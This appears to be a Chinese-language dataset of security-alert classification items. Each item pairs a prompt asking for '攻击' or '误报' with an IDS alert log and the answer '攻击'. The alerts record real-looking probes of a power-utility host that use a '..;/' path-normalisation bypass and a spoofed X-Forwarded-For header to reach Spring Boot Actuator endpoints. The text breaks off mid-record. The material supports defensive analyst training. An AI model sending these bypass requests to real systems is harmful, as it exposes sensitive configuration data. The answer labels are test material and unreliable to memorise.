"keep-alive", "api": "www.hn.sgcc.com.cn/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:51:10", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--上海市--上海市", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "6d29109c76173974c2e9ea3eeb73d22b", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732690249", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "495", "h_proto_version": "HTTP/1.1", "uri": "/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "111.231.115.230", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "475", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL3l6L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wOyBUcmlkZW50LzUuMDsgIFRyaWRlbnQvNS4wKQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSx6aC1DTjtxPTAuOCx6aDtxPTAuNw0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wDQpETlQ6IDENClJlZmVyZXI6IGh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpYLUZvcndhcmRlZC1Gb3I6IDEyNy4wLjAuMQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_4bf539a59a191a7671f81f47e1811552", "access_time": "2024-11-27 14:51:10", "attack_addr": "中国--上海市--上海市(31.232382/121.468973)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "111.231.115.230", "dimension": "3", "url_path": "/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/Vista\", \"software\": \"IE/9.0\", \"hw_type\": \"PC\"}}", "sport": "35350", "h_url": "/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732690270", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732690270, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 490, "uri": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 470, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "124.220.7.200", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 49784}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:51:10", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "52ac966c37b01d94af7a58431b509a42", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732690249", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "490", "h_proto_version": "HTTP/1.1", "uri": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.220.7.200", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "470", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL2N6L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBydjo1NC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksemgtQ047cT0wLjgsemg7cT0wLjcNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MA0KRE5UOiAxDQpSZWZlcmVyOiBodHRwczovL3d3dy5nb29nbGUuY29tLw0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KWC1Gb3J3YXJkZWQtRm9yOiAxMjcuMC4wLjENCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_2aaa3d2d1bdd77e4e67651cf231f9fe1", "access_time": "2024-11-27 14:51:10", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "124.220.7.200", "dimension": "3", "url_path": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Firefox/68.0\", \"hw_type\": \"PC\"}}", "sport": "49784", "h_url": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732690146", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732690146, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 539, "uri": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 519, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "101.34.251.108", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 45406}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:49:06", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "03ea5a9ed3785e7a82e6a8777d846b3e", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732690125", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "539", "h_proto_version": "HTTP/1.1", "uri": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.34.251.108", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "519", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL3N5L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xM182KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzYuMC4zODA5LjEwMCBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LHpoLUNOO3E9MC44LHpoO3E9MC43DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTANCkROVDogMQ0KUmVmZXJlcjogaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8NClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_2e36320142fcc3fa863828d3e79066e8", "access_time": "2024-11-27 14:49:06", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "101.34.251.108", "dimension": "3", "url_path": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.13\", \"software\": \"Chrome/76.0.3809\", \"hw_type\": \"PC\"}}", "sport": "45406", "h_url": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732689416", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732689416, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 539, "uri": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 519, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "175.178.12.116", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 48412}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:36:56", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "fd0ed547f0d535d6a90da68d94dbdac4", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 